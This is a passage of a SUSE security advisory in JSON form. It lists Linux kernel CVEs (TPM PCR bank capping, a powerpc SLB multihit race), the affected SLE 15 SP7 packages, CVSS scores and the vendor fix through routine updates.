"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-11T14:05:07Z",
"details": "moderate"
}
],
"title": "CVE-2025-71076"
},
{
"cve": "CVE-2025-71077",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71077"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ntpm: Cap the number of PCR banks\n\ntpm2_get_pcr_allocation() does not cap any upper limit for the number of\nbanks. Cap the limit to eight banks so that out of bounds values coming\nfrom external I/O cause on only limited harm.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71077",
"url": "https://www.suse.com/security/cve/CVE-2025-71077"
},
{
"category": "external",
"summary": "SUSE Bug 1256613 for CVE-2025-71077",
"url": "https://bugzilla.suse.com/1256613"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-11T14:05:07Z",
"details": "moderate"
}
],
"title": "CVE-2025-71077"
},
{
"cve": "CVE-2025-71078",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71078"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\npowerpc/64s/slb: Fix SLB multihit issue during SLB preload\n\nOn systems using the hash MMU, there is a software SLB preload cache that\nmirrors the entries loaded into the hardware SLB buffer. This preload\ncache is subject to periodic eviction - typically after every 256 context\nswitches - to remove old entry.\n\nTo optimize performance, the kernel skips switch_mmu_context() in\nswitch_mm_irqs_off() when the prev and next mm_struct are the same.\nHowever, on hash MMU systems, this can lead to inconsistencies between\nthe hardware SLB and the software preload cache.\n\nIf an SLB entry for a process is evicted from the software cache on one\nCPU, and the same process later runs on another CPU without executing\nswitch_mmu_context(), the hardware SLB may retain stale entries. If the\nkernel then attempts to reload that entry, it can trigger an SLB\nmulti-hit error.\n\nThe following timeline shows how stale SLB entries are created and can\ncause a multi-hit error when a process moves between CPUs without a\nMMU context switch.\n\nCPU 0 CPU 1\n----- -----\nProcess P\nexec swapper/1\n load_elf_binary\n begin_new_exc\n activate_mm\n switch_mm_irqs_off\n switch_mmu_context\n switch_slb\n /*\n * This invalidates all\n * the entries in the HW\n * and setup the new HW\n * SLB entries as per the\n * preload cache.\n */\ncontext_switch\nsched_migrate_task migrates process P to cpu-1\n\nProcess swapper/0 context switch (to process P)\n(uses mm_struct of Process P) switch_mm_irqs_off()\n switch_slb\n load_slb++\n /*\n * load_slb becomes 0 here\n * and we evict an entry from\n * the preload cache with\n * preload_age(). We still\n * keep HW SLB and preload\n * cache in sync, that is\n * because all HW SLB entries\n * anyways gets evicted in\n * switch_slb during SLBIA.\n * We then only add those\n * entries back in HW SLB,\n * which are currently\n * present in preload_cache\n * (after eviction).\n */\n load_elf_binary continues...\n setup_new_exec()\n slb_setup_new_exec()\n\n sched_switch event\n sched_migrate_task migrates\n process P to cpu-0\n\ncontext_switch from swapper/0 to Process P\n switch_mm_irqs_off()\n /*\n * Since both prev and next mm struct are same we don\u0027t call\n * switch_mmu_context(). This will cause the HW SLB and SW preload\n * cache to go out of sync in preload_new_slb_context. Because there\n * was an SLB entry which was evicted from both HW and preload cache\n * on cpu-1. Now later in preload_new_slb_context(), when we will try\n * to add the same preload entry again, we will add this to the SW\n * preload cache and then will add it to the HW SLB. Since on cpu-0\n * this entry was never invalidated, hence adding this entry to the HW\n * SLB will cause a SLB multi-hit error.\n */\nload_elf_binary cont\n---truncated---",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
